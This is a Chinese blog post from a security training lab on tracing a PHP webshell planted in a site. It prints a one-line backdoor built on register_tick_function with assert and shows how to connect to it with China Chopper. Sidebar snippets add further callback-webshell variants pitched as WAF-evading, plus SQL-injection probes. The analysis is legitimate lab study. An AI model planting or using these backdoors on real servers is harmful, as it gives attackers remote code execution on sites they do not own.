墨者 - WebShell代码分析溯源(第10题)

最新推荐文章于 2019-09-04 22:31:57 发布
最新推荐文章于 2019-09-04 22:31:57 发布
阅读量259 收藏
点赞数
分类专栏: 墨者刷题笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39936434/article/details/95972826
版权

下载文件,找到木马文件

 代码如下:

<?php
error_reporting(0);
$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function ($e, $_REQUEST['GET']);
?>

 这个是一句话木马变种:

这里解释一下register_tick_function函数,这是每个tick上注册一个执行函数,必须要和declare流程控制机制合并使用。

Tick 是一个在 declare 代码段中解释器每执行 N 条低级语句就会发生的事件。N 的值是在 declare 中的 directive 部分用 ticks=N 来指定的。在每个 tick 中出现的事件是由 register_tick_function() 来指定的。

可以粗略的理解为每执行一句php代码(例如:$num=1;)就去执行下已经注册的tick函数。

j/www/hack/static/css.php?e=assert   密码就是 GET

接下来就是菜刀无惧链接

拿到key

 

吃肉唐僧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php 留言板 木马_PHP一句话木马研究
weixin_33365844的博客
03-09 406
*本文原创作者:Gxian,本文属于FreeBuf原创奖励计划,未经许可禁止转载最近在研究PHP一句话后门,查阅了很多大佬的博客,并从中衍生出了一些可用的方法。现总结如下:方案一:回调函数回调函数:Callback (即call then back 被主函数调用运算后会返回主函数),是指通过函数参数传递到其它代码的,某一块可执行代码的引用。已被D盾查杀的函数:array_filter()array...
php回调后门,php过WAF一句话,php最新一句话,php过狗一句话.
SetToken的博客
03-21 7760
中国菜刀下载,基于原版中国菜刀优化版20160309. 下载地址: http://download.csdn.net/detail/settoken/9457567 http://pan.baidu.com/s/1jHoJxHW China chopper http://pan.baidu.com/s/1eRxEYjC 分享一下,一些不需要动态函数、
墨者学院-WebShell代码分析溯源(第10)
JimWu的博客
09-04 240
WebShell代码分析溯源(第10) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、记事本、菜刀 1.访问网页,下载网页源代码。 2.在/hack/static中找出了可疑的文件css.php 3.打开文件后,发现是一句话木马病毒。 我们首先分析一下代码,declare中的ticks是需要配合register_tick_function来使用的。 当ticks=1时,...
墨者学院 - WebShell代码分析溯源(第10)
多崎巡礼的博客
08-05 501
审查代码 1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2、没有新的发现,就去目录查找,根据最后的修改时间排查。   &lt;?php error_reporting(0); $e = $_REQUEST['e']; declare(ticks=1); register_tick_function ($e, $_REQUEST...
墨者学院-WebShell代码分析溯源(第9)
JimWu的博客
09-04 188
WebShell代码分析溯源(第9) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、Adobe Dreamweaver CS6、菜刀 1.访问网页,下载网页源代码。 2.根据最后的修改时间,确定可疑的文件。 3.打开文件,发现是一句话木马病毒。 register_shutdown_function函数是在代码执行完成后执行的,所以当e=assert时,把$_REQUES...
墨者学院-WebShell代码分析溯源(第5)
JimWu的博客
09-04 341
WebShell代码分析溯源(第5) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、Adobe Dreamweaver CS6、菜刀 1.访问网页,下载网页源代码。 2.审查php文件后发现了一个疑似木马的文件Exception.php。 3.打开文件,分析代码,有点像一句话木马。 分析后,发现call_user_func属于回调函数,第一个参数为函数,第二个参数作为回...
关于PHP中的webshell
weixin_33824363的博客
05-16 9245
一、webshell简介 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 顾名思义,“web”的含义是显然需要服务器开放...
墨者 - WebShell代码分析溯源(第6)
吃肉唐僧的博客
07-13 219
下载文件,又是一番探索木马文件 发现如下代码 <?php error_reporting(0); $e = $_REQUEST['e']; $arr = array($_POST['POST'],); array_map(base64_decode($e), $arr); ?> 这个也是一句木马的变种,获取url的e参数值(需要经过base64编码),链接密码是POST ...
墨者学院-WebShell代码分析溯源(第6)
JimWu的博客
09-04 208
WebShell代码分析溯源(第6) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、菜刀、记事本 1.访问网页,下载网页源代码。 2.查看每个文件夹的源代码,发现在/Assets/upload中有可疑文件,php文件想冒充jpg。 3.打开文件,发现果然是一句话木马。 分析代码,了解到array_map属于回调函数。 base64_decode(e)为函数,e)为函数,...
WEBwebshell回调php总结
HAPPY
08-19 4276
 目录  经典一句话 利用简单的拼接字符串 利用php回调函数等技巧绕过WAF的方法(姑且简称“回调后门”吧) 1. 利用 array_filter+base64_decode 2.利用array_map+base64_decode 3.利用uasort+base64_decode  4.利用array_walk+preg_replace 5.利用array_walk_recurs...
PHP后门之冷门回调函数(过waf)
weixin_30731305的博客
05-06 262
header_register_callback(create_function('','return assert($_POST[\'k\']);')); $e = $_REQUEST['e']; declare(ticks=1); register_tick_function ($e, $_REQUEST['pass']);` 数据库回调后门 ...
CTF-web 第一部分 MD5
iamsongyu的博客
10-08 8528
一. 哈希解密与攻击 哈希就是把任意长度的输入(又叫做预映射pre-image)通过散列算法变换成固定长度的输出,通常用来进行文件摘要或者信息加密。虽说很难具有相同哈希的文件,但是某些特意构造的 信息还是会满足相同的哈希,而且有些时候可以使用字典的方式进行解密和使用哈希攻击。 0x00 SHA $_GET['name'] == $_GET['password'] sha1($_GET['n...
Webshell到肉鸡
weixin_34032792的博客
01-04 194
Webshell到肉鸡S.S.F simeon   我一直都在强调一个东西,在网络***中最重要的就是思维,本文的灵感来自于安天365团队的一个篇稿件,在稿件中提到了一个AspxSpy的Asp.net类型后门软件,在安全界中最近一直流行后门中的后门,即通过给出一个包含后门的Webshell程序,众多小黑们在外面吭哧吭哧的干活,而给出后门的老板,却在后面偷着数Webshell,这种后门...
CTF-web 第十部分 webshell基础与免杀
热门推荐
iamsongyu的博客
11-15 1万+
一、什么是webshell (1)webshell简介         webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载...
墨者 - SQL注入漏洞测试(布尔盲注)
吃肉唐僧的博客
07-01 5119
手工注入 根据浮动的通告进度条,找到sql注入点 输入/new_list.php?id=1' and 1=1,内容空白 输入/new_list.php?id=1 and 1=1,内容显示,判断这个id的值类型是数字类型 然后开始判断数据库名字的长度,/new_list.php?id=1 and length(database())=1,内容空白。一直试,试到长度为10 ...
墨者 - X-Forwarded-For注入漏洞实战
吃肉唐僧的博客
07-10 4020
X-Forwarded-For 刷之前先知道这个是什么东西,X-Forwarded-For 是一个 HTTP 扩展头部。HTTP/1.1(RFC 2616)协议并没有对它的定义,它最开始是由 Squid 这个缓存代理软件引入,用来表示 HTTP 请求端真实 IP。如今它已经成为事实上的标准,被各大 HTTP 代理、负载均衡等转发服务广泛使用,并被写入RFC 7239(Forwarded...
墨者 - Struts2 命令执行系列
吃肉唐僧的博客
06-30 2921
前言 刷了好几道Struts2远程代码执行漏洞,发觉虽然触发不同,但是本质道理一样。所以整合一下目前刷过的Struts2系列漏洞。以后刷了新的再补充。 ongl 表达式 Struts2 命令执行的原因都是是通过 Ognl 表达式执行 java 代码,最终实现命令执行。所以应该需要先了解 ognl 表达式 。 此处引用http://www.zerokeeper.com/...
墨者-sql手工注入漏洞测试
最新发布
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值